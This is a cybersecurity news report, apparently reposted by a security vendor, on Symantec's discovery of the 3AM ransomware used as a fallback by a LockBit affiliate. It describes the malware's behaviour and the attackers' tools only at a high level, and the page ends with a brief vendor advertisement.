A new ransomware strain called 3AM has been discovered after a threat actor used it in an attack that failed to deploy LockBit ransomware on a target network.
A new ransomware strain called 3AM has been discovered after a threat actor used it in an attack that failed to deploy LockBit ransomware on a target network.
Symantec's Threat Hunter Team, part of Broadcom, says that attacks using 3AM ransomware are rare. The threat actors managed to deploy the ransomware to three computers on the target organisation's network but blocked two of those three machines. 3AM ransomware extortion follows the common trend of stealing data before encrypting it and dropping a ransom note threatening to sell the stolen information unless the attacker gets paid.
3AM is written in Rust and appears unrelated to any known ransomware family, making it a completely new malware.
Before the encryption process, the ransomware attempts to stop multiple services running on the infected system for various security and backup products from vendors like Veeam, Acronis, Ivanti, McAfee, or Symantec. Once the encryption completes, it attempts to delete Volume Shadow (VSS) copies.
The malware appends the extension .threeamtime to the filenames of encrypted files. The researchers have yet to determine whether the threat actors behind 3AM have any connection with known cybercrime groups.
The attackers used the post-exploitation tool Cobalt Strike, which then attempted to run reconnaissance commands (i.e. whoami, netstat, quser, and net share) for lateral movement. The exact ingress route employed in the attack is unclear.
They also added a new user for persistence and used the Wput tool to exfiltrate the victims' files to their own FTP server," Symantec noted.
The ransomware is a 64-bit executable that supports multiple commands to stop applications from performing backups and security software. The malware only encrypts files matching predefined criteria.
"Ransomware affiliates have become increasingly independent from ransomware operators, and this is not the first time Symantec has seen an attacker attempt to deploy two different kinds of ransomware in a single attack," Symantec said.
"New ransomware families appear frequently, and most disappear quickly or never manage to gain significant traction. However, the fact that 3AM was used as a fallback by a LockBit affiliate suggests that it may be of interest to attackers and could be seen again in the future."
Want your digital assets to be protected?
CyberShelter provides innovative and modern cybersecurity products and niche services to individuals and organization against all kinds of cyber threats.
For the latest cyber threats and the latest hacking news please follow us on Facebook, Linkedin, and Twitter.
You may be interested in reading: How to Survive the COVID Time Cyber Security Threats?